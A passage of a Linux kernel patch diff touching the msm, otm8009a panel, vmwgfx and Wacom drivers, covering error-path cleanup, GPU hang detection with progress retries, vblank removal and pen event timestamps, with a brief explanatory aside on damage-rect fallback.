+ 		kms->funcs->destroy(kms);
+ 
+-	if (priv->vram.paddr) {
+-		unsigned long attrs = DMA_ATTR_NO_KERNEL_MAPPING;
+-		drm_mm_takedown(&priv->vram.mm);
+-		dma_free_attrs(dev, priv->vram.size, NULL,
+-			       priv->vram.paddr, attrs);
+-	}
++	msm_deinit_vram(ddev);
+ 
+ 	component_unbind_all(dev, ddev);
+ 
+@@ -401,6 +401,19 @@ static int msm_init_vram(struct drm_device *dev)
+ 	return ret;
+ }
+ 
++static void msm_deinit_vram(struct drm_device *ddev)
++{
++	struct msm_drm_private *priv = ddev->dev_private;
++	unsigned long attrs = DMA_ATTR_NO_KERNEL_MAPPING;
++
++	if (!priv->vram.paddr)
++		return;
++
++	drm_mm_takedown(&priv->vram.mm);
++	dma_free_attrs(ddev->dev, priv->vram.size, NULL, priv->vram.paddr,
++			attrs);
++}
++
+ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ {
+ 	struct msm_drm_private *priv = dev_get_drvdata(dev);
+@@ -420,7 +433,10 @@ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ 	priv->dev = ddev;
+ 
+ 	priv->wq = alloc_ordered_workqueue("msm", 0);
+-	priv->hangcheck_period = DRM_MSM_HANGCHECK_DEFAULT_PERIOD;
++	if (!priv->wq) {
++		ret = -ENOMEM;
++		goto err_put_dev;
++	}
+ 
+ 	INIT_LIST_HEAD(&priv->objects);
+ 	mutex_init(&priv->obj_lock);
+@@ -443,12 +459,12 @@ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ 
+ 	ret = msm_init_vram(ddev);
+ 	if (ret)
+-		return ret;
++		goto err_cleanup_mode_config;
+ 
+ 	/* Bind all our sub-components: */
+ 	ret = component_bind_all(dev, ddev);
+ 	if (ret)
+-		return ret;
++		goto err_deinit_vram;
+ 
+ 	dma_set_max_seg_size(dev, UINT_MAX);
+ 
+@@ -543,6 +559,17 @@ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ 
+ err_msm_uninit:
+ 	msm_drm_uninit(dev);
++
++	return ret;
++
++err_deinit_vram:
++	msm_deinit_vram(ddev);
++err_cleanup_mode_config:
++	drm_mode_config_cleanup(ddev);
++	destroy_workqueue(priv->wq);
++err_put_dev:
++	drm_dev_put(ddev);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/msm/msm_drv.h b/drivers/gpu/drm/msm/msm_drv.h
+index b2ea262296a4f..d4e0ef608950e 100644
+--- a/drivers/gpu/drm/msm/msm_drv.h
++++ b/drivers/gpu/drm/msm/msm_drv.h
+@@ -224,7 +224,13 @@ struct msm_drm_private {
+ 
+ 	struct drm_atomic_state *pm_state;
+ 
+-	/* For hang detection, in ms */
++	/**
++	 * hangcheck_period: For hang detection, in ms
++	 *
++	 * Note that in practice, a submit/job will get at least two hangcheck
++	 * periods, due to checking for progress being implemented as simply
++	 * "have the CP position registers changed since last time?"
++	 */
+ 	unsigned int hangcheck_period;
+ 
+ 	/**
+diff --git a/drivers/gpu/drm/msm/msm_gpu.c b/drivers/gpu/drm/msm/msm_gpu.c
+index 4f495eecc34ba..3802495003258 100644
+--- a/drivers/gpu/drm/msm/msm_gpu.c
++++ b/drivers/gpu/drm/msm/msm_gpu.c
+@@ -494,6 +494,21 @@ static void hangcheck_timer_reset(struct msm_gpu *gpu)
+ 			round_jiffies_up(jiffies + msecs_to_jiffies(priv->hangcheck_period)));
+ }
+ 
++static bool made_progress(struct msm_gpu *gpu, struct msm_ringbuffer *ring)
++{
++	if (ring->hangcheck_progress_retries >= DRM_MSM_HANGCHECK_PROGRESS_RETRIES)
++		return false;
++
++	if (!gpu->funcs->progress)
++		return false;
++
++	if (!gpu->funcs->progress(gpu, ring))
++		return false;
++
++	ring->hangcheck_progress_retries++;
++	return true;
++}
++
+ static void hangcheck_handler(struct timer_list *t)
+ {
+ 	struct msm_gpu *gpu = from_timer(gpu, t, hangcheck_timer);
+@@ -504,9 +519,12 @@ static void hangcheck_handler(struct timer_list *t)
+ 	if (fence != ring->hangcheck_fence) {
+ 		/* some progress has been made.. ya! */
+ 		ring->hangcheck_fence = fence;
+-	} else if (fence_before(fence, ring->fctx->last_fence)) {
++		ring->hangcheck_progress_retries = 0;
++	} else if (fence_before(fence, ring->fctx->last_fence) &&
++			!made_progress(gpu, ring)) {
+ 		/* no progress and not done.. hung! */
+ 		ring->hangcheck_fence = fence;
++		ring->hangcheck_progress_retries = 0;
+ 		DRM_DEV_ERROR(dev->dev, "%s: hangcheck detected gpu lockup rb %d!\n",
+ 				gpu->name, ring->id);
+ 		DRM_DEV_ERROR(dev->dev, "%s:     completed fence: %u\n",
+@@ -832,6 +850,7 @@ int msm_gpu_init(struct drm_device *drm, struct platform_device *pdev,
+ 		struct msm_gpu *gpu, const struct msm_gpu_funcs *funcs,
+ 		const char *name, struct msm_gpu_config *config)
+ {
++	struct msm_drm_private *priv = drm->dev_private;
+ 	int i, ret, nr_rings = config->nr_rings;
+ 	void *memptrs;
+ 	uint64_t memptrs_iova;
+@@ -859,6 +878,16 @@ int msm_gpu_init(struct drm_device *drm, struct platform_device *pdev,
+ 	kthread_init_work(&gpu->recover_work, recover_worker);
+ 	kthread_init_work(&gpu->fault_work, fault_worker);
+ 
++	priv->hangcheck_period = DRM_MSM_HANGCHECK_DEFAULT_PERIOD;
++
++	/*
++	 * If progress detection is supported, halve the hangcheck timer
++	 * duration, as it takes two iterations of the hangcheck handler
++	 * to detect a hang.
++	 */
++	if (funcs->progress)
++		priv->hangcheck_period /= 2;
++
+ 	timer_setup(&gpu->hangcheck_timer, hangcheck_handler, 0);
+ 
+ 	spin_lock_init(&gpu->perf_lock);
+diff --git a/drivers/gpu/drm/msm/msm_gpu.h b/drivers/gpu/drm/msm/msm_gpu.h
+index a89bfdc3d7f90..732295e256834 100644
+--- a/drivers/gpu/drm/msm/msm_gpu.h
++++ b/drivers/gpu/drm/msm/msm_gpu.h
+@@ -78,6 +78,15 @@ struct msm_gpu_funcs {
+ 	struct msm_gem_address_space *(*create_private_address_space)
+ 		(struct msm_gpu *gpu);
+ 	uint32_t (*get_rptr)(struct msm_gpu *gpu, struct msm_ringbuffer *ring);
++
++	/**
++	 * progress: Has the GPU made progress?
++	 *
++	 * Return true if GPU position in cmdstream has advanced (or changed)
++	 * since the last call.  To avoid false negatives, this should account
++	 * for cmdstream that is buffered in this FIFO upstream of the CP fw.
++	 */
++	bool (*progress)(struct msm_gpu *gpu, struct msm_ringbuffer *ring);
+ };
+ 
+ /* Additional state for iommu faults: */
+@@ -237,6 +246,7 @@ struct msm_gpu {
+ #define DRM_MSM_INACTIVE_PERIOD   66 /* in ms (roughly four frames) */
+ 
+ #define DRM_MSM_HANGCHECK_DEFAULT_PERIOD 500 /* in ms */
++#define DRM_MSM_HANGCHECK_PROGRESS_RETRIES 3
+ 	struct timer_list hangcheck_timer;
+ 
+ 	/* Fault info for most recent iova fault: */
+@@ -548,7 +558,7 @@ static inline void gpu_rmw(struct msm_gpu *gpu, u32 reg, u32 mask, u32 or)
+ 	msm_rmw(gpu->mmio + (reg << 2), mask, or);
+ }
+ 
+-static inline u64 gpu_read64(struct msm_gpu *gpu, u32 lo, u32 hi)
++static inline u64 gpu_read64(struct msm_gpu *gpu, u32 reg)
+ {
+ 	u64 val;
+ 
+@@ -566,17 +576,17 @@ static inline u64 gpu_read64(struct msm_gpu *gpu, u32 lo, u32 hi)
+ 	 * when the lo is read, so make sure to read the lo first to trigger
+ 	 * that
+ 	 */
+-	val = (u64) msm_readl(gpu->mmio + (lo << 2));
+-	val |= ((u64) msm_readl(gpu->mmio + (hi << 2)) << 32);
++	val = (u64) msm_readl(gpu->mmio + (reg << 2));
++	val |= ((u64) msm_readl(gpu->mmio + ((reg + 1) << 2)) << 32);
+ 
+ 	return val;
+ }
+ 
+-static inline void gpu_write64(struct msm_gpu *gpu, u32 lo, u32 hi, u64 val)
++static inline void gpu_write64(struct msm_gpu *gpu, u32 reg, u64 val)
+ {
+ 	/* Why not a writeq here? Read the screed above */
+-	msm_writel(lower_32_bits(val), gpu->mmio + (lo << 2));
+-	msm_writel(upper_32_bits(val), gpu->mmio + (hi << 2));
++	msm_writel(lower_32_bits(val), gpu->mmio + (reg << 2));
++	msm_writel(upper_32_bits(val), gpu->mmio + ((reg + 1) << 2));
+ }
+ 
+ int msm_gpu_pm_suspend(struct msm_gpu *gpu);
+diff --git a/drivers/gpu/drm/msm/msm_ringbuffer.h b/drivers/gpu/drm/msm/msm_ringbuffer.h
+index 2a5045abe46e8..698b333abccd6 100644
+--- a/drivers/gpu/drm/msm/msm_ringbuffer.h
++++ b/drivers/gpu/drm/msm/msm_ringbuffer.h
+@@ -35,6 +35,11 @@ struct msm_rbmemptrs {
+ 	volatile u64 ttbr0;
+ };
+ 
++struct msm_cp_state {
++	uint64_t ib1_base, ib2_base;
++	uint32_t ib1_rem, ib2_rem;
++};
++
+ struct msm_ringbuffer {
+ 	struct msm_gpu *gpu;
+ 	int id;
+@@ -64,6 +69,29 @@ struct msm_ringbuffer {
+ 	uint64_t memptrs_iova;
+ 	struct msm_fence_context *fctx;
+ 
++	/**
++	 * hangcheck_progress_retries:
++	 *
++	 * The number of extra hangcheck duration cycles that we have granted
++	 * because the GPU appears to be making forward progress.
++	 *
++	 * For GPU generations which support progress detection (see
++	 * msm_gpu_funcs::progress()), if the GPU appears to be making progress
++	 * (i.e. the CP has advanced in the command stream), we'll allow up to
++	 * DRM_MSM_HANGCHECK_PROGRESS_RETRIES expirations of the hangcheck timer
++	 * before killing the job.  But to detect progress we need two sample
++	 * points, so the duration of the hangcheck timer is halved.  In other
++	 * words we'll let the submit run for up to:
++	 *
++	 * (DRM_MSM_HANGCHECK_DEFAULT_PERIOD / 2) * (DRM_MSM_HANGCHECK_PROGRESS_RETRIES + 1)
++	 */
++	int hangcheck_progress_retries;
++
++	/**
++	 * last_cp_state: The state of the CP at the last call to gpu->progress()
++	 */
++	struct msm_cp_state last_cp_state;
++
+ 	/*
+ 	 * preempt_lock protects preemption and serializes wptr updates against
+ 	 * preemption.  Can be aquired from irq context.
+diff --git a/drivers/gpu/drm/panel/panel-orisetech-otm8009a.c b/drivers/gpu/drm/panel/panel-orisetech-otm8009a.c
+index b4729a94c34a8..898b892f11439 100644
+--- a/drivers/gpu/drm/panel/panel-orisetech-otm8009a.c
++++ b/drivers/gpu/drm/panel/panel-orisetech-otm8009a.c
+@@ -471,7 +471,7 @@ static int otm8009a_probe(struct mipi_dsi_device *dsi)
+ 		       DRM_MODE_CONNECTOR_DSI);
+ 
+ 	ctx->bl_dev = devm_backlight_device_register(dev, dev_name(dev),
+-						     dsi->host->dev, ctx,
++						     dev, ctx,
+ 						     &otm8009a_backlight_ops,
+ 						     NULL);
+ 	if (IS_ERR(ctx->bl_dev)) {
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+index 0bc1ebc43002b..1ec9c53a7bf43 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+@@ -1221,9 +1221,6 @@ int vmw_kms_write_svga(struct vmw_private *vmw_priv,
+ bool vmw_kms_validate_mode_vram(struct vmw_private *dev_priv,
+ 				uint32_t pitch,
+ 				uint32_t height);
+-u32 vmw_get_vblank_counter(struct drm_crtc *crtc);
+-int vmw_enable_vblank(struct drm_crtc *crtc);
+-void vmw_disable_vblank(struct drm_crtc *crtc);
+ int vmw_kms_present(struct vmw_private *dev_priv,
+ 		    struct drm_file *file_priv,
+ 		    struct vmw_framebuffer *vfb,
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+index 13721bcf047c0..aab6389cb4aab 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+@@ -31,7 +31,6 @@
+ #include <drm/drm_fourcc.h>
+ #include <drm/drm_rect.h>
+ #include <drm/drm_sysfs.h>
+-#include <drm/drm_vblank.h>
+ 
+ #include "vmwgfx_kms.h"
+ 
+@@ -832,15 +831,6 @@ void vmw_du_crtc_atomic_begin(struct drm_crtc *crtc,
+ void vmw_du_crtc_atomic_flush(struct drm_crtc *crtc,
+ 			      struct drm_atomic_state *state)
+ {
+-	struct drm_pending_vblank_event *event = crtc->state->event;
+-
+-	if (event) {
+-		crtc->state->event = NULL;
+-
+-		spin_lock_irq(&crtc->dev->event_lock);
+-		drm_crtc_send_vblank_event(crtc, event);
+-		spin_unlock_irq(&crtc->dev->event_lock);
+-	}
+ }
+ 
+ 
+@@ -1274,70 +1264,10 @@ static void vmw_framebuffer_bo_destroy(struct drm_framebuffer *framebuffer)
+ 	kfree(vfbd);
+ }
+ 
+-static int vmw_framebuffer_bo_dirty(struct drm_framebuffer *framebuffer,
+-				    struct drm_file *file_priv,
+-				    unsigned int flags, unsigned int color,
+-				    struct drm_clip_rect *clips,
+-				    unsigned int num_clips)
+-{
+-	struct vmw_private *dev_priv = vmw_priv(framebuffer->dev);
+-	struct vmw_framebuffer_bo *vfbd =
+-		vmw_framebuffer_to_vfbd(framebuffer);
+-	struct drm_clip_rect norect;
+-	int ret, increment = 1;
+-
+-	drm_modeset_lock_all(&dev_priv->drm);
+-
+-	if (!num_clips) {
+-		num_clips = 1;
+-		clips = &norect;
+-		norect.x1 = norect.y1 = 0;
+-		norect.x2 = framebuffer->width;
+-		norect.y2 = framebuffer->height;
+-	} else if (flags & DRM_MODE_FB_DIRTY_ANNOTATE_COPY) {
+-		num_clips /= 2;
+-		increment = 2;
+-	}
+-
+-	switch (dev_priv->active_display_unit) {
+-	case vmw_du_legacy:
+-		ret = vmw_kms_ldu_do_bo_dirty(dev_priv, &vfbd->base, 0, 0,
+-					      clips, num_clips, increment);
+-		break;
+-	default:
+-		ret = -EINVAL;
+-		WARN_ONCE(true, "Dirty called with invalid display system.\n");
+-		break;
+-	}
+-
+-	vmw_cmd_flush(dev_priv, false);
+-
+-	drm_modeset_unlock_all(&dev_priv->drm);
+-
+-	return ret;
+-}
+-
+-static int vmw_framebuffer_bo_dirty_ext(struct drm_framebuffer *framebuffer,
+-					struct drm_file *file_priv,
+-					unsigned int flags, unsigned int color,
+-					struct drm_clip_rect *clips,
+-					unsigned int num_clips)
+-{
+-	struct vmw_private *dev_priv = vmw_priv(framebuffer->dev);
+-
+-	if (dev_priv->active_display_unit == vmw_du_legacy &&
+-	    vmw_cmd_supported(dev_priv))
+-		return vmw_framebuffer_bo_dirty(framebuffer, file_priv, flags,
+-						color, clips, num_clips);
+-
+-	return drm_atomic_helper_dirtyfb(framebuffer, file_priv, flags, color,
+-					 clips, num_clips);
+-}
+-
+ static const struct drm_framebuffer_funcs vmw_framebuffer_bo_funcs = {
+ 	.create_handle = vmw_framebuffer_bo_create_handle,
+ 	.destroy = vmw_framebuffer_bo_destroy,
+-	.dirty = vmw_framebuffer_bo_dirty_ext,
++	.dirty = drm_atomic_helper_dirtyfb,
+ };
+ 
+ /*
+@@ -2158,30 +2088,6 @@ bool vmw_kms_validate_mode_vram(struct vmw_private *dev_priv,
+ 		 dev_priv->max_primary_mem : dev_priv->vram_size);
+ }
+ 
+-
+-/*
+- * Function called by DRM code called with vbl_lock held.
+- */
+-u32 vmw_get_vblank_counter(struct drm_crtc *crtc)
+-{
+-	return 0;
+-}
+-
+-/*
+- * Function called by DRM code called with vbl_lock held.
+- */
+-int vmw_enable_vblank(struct drm_crtc *crtc)
+-{
+-	return -EINVAL;
+-}
+-
+-/*
+- * Function called by DRM code called with vbl_lock held.
+- */
+-void vmw_disable_vblank(struct drm_crtc *crtc)
+-{
+-}
+-
+ /**
+  * vmw_du_update_layout - Update the display unit with topology from resolution
+  * plugin and generate DRM uevent
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
+index 85f86faa32439..b02d2793659f9 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
+@@ -517,11 +517,6 @@ void vmw_du_connector_destroy_state(struct drm_connector *connector,
+  */
+ int vmw_kms_ldu_init_display(struct vmw_private *dev_priv);
+ int vmw_kms_ldu_close_display(struct vmw_private *dev_priv);
+-int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
+-			    struct vmw_framebuffer *framebuffer,
+-			    unsigned int flags, unsigned int color,
+-			    struct drm_clip_rect *clips,
+-			    unsigned int num_clips, int increment);
+ int vmw_kms_update_proxy(struct vmw_resource *res,
+ 			 const struct drm_clip_rect *clips,
+ 			 unsigned num_clips,
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c b/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
+index b8761f16dd785..ac72c20715f32 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
+@@ -28,7 +28,6 @@
+ #include <drm/drm_atomic.h>
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_fourcc.h>
+-#include <drm/drm_vblank.h>
+ 
+ #include "vmwgfx_kms.h"
+ 
+@@ -235,9 +234,7 @@ static const struct drm_crtc_funcs vmw_legacy_crtc_funcs = {
+ 	.atomic_duplicate_state = vmw_du_crtc_duplicate_state,
+ 	.atomic_destroy_state = vmw_du_crtc_destroy_state,
+ 	.set_config = drm_atomic_helper_set_config,
+-	.get_vblank_counter = vmw_get_vblank_counter,
+-	.enable_vblank = vmw_enable_vblank,
+-	.disable_vblank = vmw_disable_vblank,
++	.page_flip = drm_atomic_helper_page_flip,
+ };
+ 
+ 
+@@ -277,6 +274,12 @@ static const struct
+ drm_connector_helper_funcs vmw_ldu_connector_helper_funcs = {
+ };
+ 
++static int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
++				   struct vmw_framebuffer *framebuffer,
++				   unsigned int flags, unsigned int color,
++				   struct drm_mode_rect *clips,
++				   unsigned int num_clips);
++
+ /*
+  * Legacy Display Plane Functions
+  */
+@@ -295,7 +298,6 @@ vmw_ldu_primary_plane_atomic_update(struct drm_plane *plane,
+ 	struct drm_framebuffer *fb;
+ 	struct drm_crtc *crtc = new_state->crtc ?: old_state->crtc;
+ 
+-
+ 	ldu = vmw_crtc_to_ldu(crtc);
+ 	dev_priv = vmw_priv(plane->dev);
+ 	fb       = new_state->fb;
+@@ -308,8 +310,31 @@ vmw_ldu_primary_plane_atomic_update(struct drm_plane *plane,
+ 		vmw_ldu_del_active(dev_priv, ldu);
+ 
+ 	vmw_ldu_commit_list(dev_priv);
+-}
+ 
++	if (vfb && vmw_cmd_supported(dev_priv)) {
++		struct drm_mode_rect fb_rect = {
++			.x1 = 0,
++			.y1 = 0,
++			.x2 = vfb->base.width,
++			.y2 = vfb->base.height
++		};
++		struct drm_mode_rect *damage_rects = drm_plane_get_damage_clips(new_state);
++		u32 rect_count = drm_plane_get_damage_clips_count(new_state);
++		int ret;
++
++		if (!damage_rects) {
++			damage_rects = &fb_rect;
++			rect_count = 1;
++		}
++
++		ret = vmw_kms_ldu_do_bo_dirty(dev_priv, vfb, 0, 0, damage_rects, rect_count);
++
++		drm_WARN_ONCE(plane->dev, ret,
++			"vmw_kms_ldu_do_bo_dirty failed with: ret=%d\n", ret);
++
++		vmw_cmd_flush(dev_priv, false);
++	}
++}
+ 
+ static const struct drm_plane_funcs vmw_ldu_plane_funcs = {
+ 	.update_plane = drm_atomic_helper_update_plane,
+@@ -507,10 +532,6 @@ int vmw_kms_ldu_init_display(struct vmw_private *dev_priv)
+ 	dev_priv->ldu_priv->last_num_active = 0;
+ 	dev_priv->ldu_priv->fb = NULL;
+ 
+-	ret = drm_vblank_init(dev, num_display_units);
+-	if (ret != 0)
+-		goto err_free;
+-
+ 	vmw_kms_create_implicit_placement_property(dev_priv);
+ 
+ 	for (i = 0; i < num_display_units; ++i) {
+@@ -544,11 +565,11 @@ int vmw_kms_ldu_close_display(struct vmw_private *dev_priv)
+ }
+ 
+ 
+-int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
+-			    struct vmw_framebuffer *framebuffer,
+-			    unsigned int flags, unsigned int color,
+-			    struct drm_clip_rect *clips,
+-			    unsigned int num_clips, int increment)
++static int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
++				   struct vmw_framebuffer *framebuffer,
++				   unsigned int flags, unsigned int color,
++				   struct drm_mode_rect *clips,
++				   unsigned int num_clips)
+ {
+ 	size_t fifo_size;
+ 	int i;
+@@ -564,7 +585,7 @@ int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
+ 		return -ENOMEM;
+ 
+ 	memset(cmd, 0, fifo_size);
+-	for (i = 0; i < num_clips; i++, clips += increment) {
++	for (i = 0; i < num_clips; i++, clips++) {
+ 		cmd[i].header = SVGA_CMD_UPDATE;
+ 		cmd[i].body.x = clips->x1;
+ 		cmd[i].body.y = clips->y1;
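
The updated LDU plane update above synthesizes a single full-framebuffer rectangle when the atomic state carries no damage clips, so the SVGA update command always covers at least one region. A small sketch of that fallback, with a toy rect type in place of struct drm_mode_rect and the DRM damage helpers:

    #include <stdio.h>

    struct rect { int x1, y1, x2, y2; };

    static void emit_dirty(const struct rect *clips, unsigned int n,
                           int fb_w, int fb_h)
    {
        struct rect full = { 0, 0, fb_w, fb_h };
        unsigned int i;

        if (!clips || !n) {           /* no damage info: redraw everything */
            clips = &full;
            n = 1;
        }
        for (i = 0; i < n; i++)       /* driver: one SVGA_CMD_UPDATE each  */
            printf("dirty: (%d,%d)-(%d,%d)\n",
                   clips[i].x1, clips[i].y1, clips[i].x2, clips[i].y2);
    }

    int main(void)
    {
        emit_dirty(NULL, 0, 1024, 768);   /* falls back to the full rect */
        return 0;
    }
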
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_scrn.c b/drivers/gpu/drm/vmwgfx/vmwgfx_scrn.c
+index 9c79873f62f06..e1f36a09c59c1 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_scrn.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_scrn.c
+@@ -29,7 +29,6 @@
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_damage_helper.h>
+ #include <drm/drm_fourcc.h>
+-#include <drm/drm_vblank.h>
+ 
+ #include "vmwgfx_kms.h"
+ 
+@@ -320,9 +319,6 @@ static const struct drm_crtc_funcs vmw_screen_object_crtc_funcs = {
+ 	.atomic_destroy_state = vmw_du_crtc_destroy_state,
+ 	.set_config = drm_atomic_helper_set_config,
+ 	.page_flip = drm_atomic_helper_page_flip,
+-	.get_vblank_counter = vmw_get_vblank_counter,
+-	.enable_vblank = vmw_enable_vblank,
+-	.disable_vblank = vmw_disable_vblank,
+ };
+ 
+ /*
+@@ -730,7 +726,6 @@ vmw_sou_primary_plane_atomic_update(struct drm_plane *plane,
+ 	struct drm_plane_state *old_state = drm_atomic_get_old_plane_state(state, plane);
+ 	struct drm_plane_state *new_state = drm_atomic_get_new_plane_state(state, plane);
+ 	struct drm_crtc *crtc = new_state->crtc;
+-	struct drm_pending_vblank_event *event = NULL;
+ 	struct vmw_fence_obj *fence = NULL;
+ 	int ret;
+ 
+@@ -754,24 +749,6 @@ vmw_sou_primary_plane_atomic_update(struct drm_plane *plane,
+ 		return;
+ 	}
+ 
+-	/* For error case vblank event is send from vmw_du_crtc_atomic_flush */
+-	event = crtc->state->event;
+-	if (event && fence) {
+-		struct drm_file *file_priv = event->base.file_priv;
+-
+-		ret = vmw_event_fence_action_queue(file_priv,
+-						   fence,
+-						   &event->base,
+-						   &event->event.vbl.tv_sec,
+-						   &event->event.vbl.tv_usec,
+-						   true);
+-
+-		if (unlikely(ret != 0))
+-			DRM_ERROR("Failed to queue event on fence.\n");
+-		else
+-			crtc->state->event = NULL;
+-	}
+-
+ 	if (fence)
+ 		vmw_fence_obj_unreference(&fence);
+ }
+@@ -947,7 +924,7 @@ err_free:
+ int vmw_kms_sou_init_display(struct vmw_private *dev_priv)
+ {
+ 	struct drm_device *dev = &dev_priv->drm;
+-	int i, ret;
++	int i;
+ 
+ 	/* Screen objects won't work if GMR's aren't available */
+ 	if (!dev_priv->has_gmr)
+@@ -957,12 +934,6 @@ int vmw_kms_sou_init_display(struct vmw_private *dev_priv)
+ 		return -ENOSYS;
+ 	}
+ 
+-	ret = -ENOMEM;
+-
+-	ret = drm_vblank_init(dev, VMWGFX_NUM_DISPLAY_UNITS);
+-	if (unlikely(ret != 0))
+-		return ret;
+-
+ 	for (i = 0; i < VMWGFX_NUM_DISPLAY_UNITS; ++i)
+ 		vmw_sou_init(dev_priv, i);
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c b/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
+index 8650c3aea8f0a..0090abe892548 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
+@@ -29,7 +29,6 @@
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_damage_helper.h>
+ #include <drm/drm_fourcc.h>
+-#include <drm/drm_vblank.h>
+ 
+ #include "vmwgfx_kms.h"
+ #include "vmw_surface_cache.h"
+@@ -925,9 +924,6 @@ static const struct drm_crtc_funcs vmw_stdu_crtc_funcs = {
+ 	.atomic_destroy_state = vmw_du_crtc_destroy_state,
+ 	.set_config = drm_atomic_helper_set_config,
+ 	.page_flip = drm_atomic_helper_page_flip,
+-	.get_vblank_counter = vmw_get_vblank_counter,
+-	.enable_vblank = vmw_enable_vblank,
+-	.disable_vblank = vmw_disable_vblank,
+ };
+ 
+ 
+@@ -1591,7 +1587,6 @@ vmw_stdu_primary_plane_atomic_update(struct drm_plane *plane,
+ 	struct vmw_plane_state *vps = vmw_plane_state_to_vps(new_state);
+ 	struct drm_crtc *crtc = new_state->crtc;
+ 	struct vmw_screen_target_display_unit *stdu;
+-	struct drm_pending_vblank_event *event;
+ 	struct vmw_fence_obj *fence = NULL;
+ 	struct vmw_private *dev_priv;
+ 	int ret;
+@@ -1640,23 +1635,6 @@ vmw_stdu_primary_plane_atomic_update(struct drm_plane *plane,
+ 		return;
+ 	}
+ 
+-	/* In case of error, vblank event is send in vmw_du_crtc_atomic_flush */
+-	event = crtc->state->event;
+-	if (event && fence) {
+-		struct drm_file *file_priv = event->base.file_priv;
+-
+-		ret = vmw_event_fence_action_queue(file_priv,
+-						   fence,
+-						   &event->base,
+-						   &event->event.vbl.tv_sec,
+-						   &event->event.vbl.tv_usec,
+-						   true);
+-		if (ret)
+-			DRM_ERROR("Failed to queue event on fence.\n");
+-		else
+-			crtc->state->event = NULL;
+-	}
+-
+ 	if (fence)
+ 		vmw_fence_obj_unreference(&fence);
+ }
+@@ -1883,10 +1861,6 @@ int vmw_kms_stdu_init_display(struct vmw_private *dev_priv)
+ 	if (!(dev_priv->capabilities & SVGA_CAP_GBOBJECTS))
+ 		return -ENOSYS;
+ 
+-	ret = drm_vblank_init(dev, VMWGFX_NUM_DISPLAY_UNITS);
+-	if (unlikely(ret != 0))
+-		return ret;
+-
+ 	dev_priv->active_display_unit = vmw_du_screen_target;
+ 
+ 	for (i = 0; i < VMWGFX_NUM_DISPLAY_UNITS; ++i) {
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 9312d611db8e5..0c6a82c665c1d 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -1308,6 +1308,9 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 
+ 	struct input_dev *pen_input = wacom->pen_input;
+ 	unsigned char *data = wacom->data;
++	int number_of_valid_frames = 0;
++	int time_interval = 15000000;
++	ktime_t time_packet_received = ktime_get();
+ 	int i;
+ 
+ 	if (wacom->features.type == INTUOSP2_BT ||
+@@ -1328,12 +1331,30 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 		wacom->id[0] |= (wacom->serial[0] >> 32) & 0xFFFFF;
+ 	}
+ 
++	/* count the number of valid frames */
+ 	for (i = 0; i < pen_frames; i++) {
+ 		unsigned char *frame = &data[i*pen_frame_len + 1];
+ 		bool valid = frame[0] & 0x80;
++
++		if (valid)
++			number_of_valid_frames++;
++	}
++
++	if (number_of_valid_frames) {
++		if (wacom->hid_data.time_delayed)
++			time_interval = ktime_get() - wacom->hid_data.time_delayed;
++		time_interval /= number_of_valid_frames;
++		wacom->hid_data.time_delayed = time_packet_received;
++	}
++
++	for (i = 0; i < number_of_valid_frames; i++) {
++		unsigned char *frame = &data[i*pen_frame_len + 1];
++		bool valid = frame[0] & 0x80;
+ 		bool prox = frame[0] & 0x40;
+ 		bool range = frame[0] & 0x20;
+ 		bool invert = frame[0] & 0x10;
++		int frames_number_reversed = number_of_valid_frames - i - 1;
++		int event_timestamp = time_packet_received - frames_number_reversed * time_interval;
+ 
+ 		if (!valid)
+ 			continue;
+@@ -1346,6 +1367,7 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 			wacom->tool[0] = 0;
+ 			wacom->id[0] = 0;
+ 			wacom->serial[0] = 0;
++			wacom->hid_data.time_delayed = 0;
+ 			return;
+ 		}
+ 
+@@ -1382,6 +1404,7 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 						 get_unaligned_le16(&frame[11]));
+ 			}
+ 		}
++
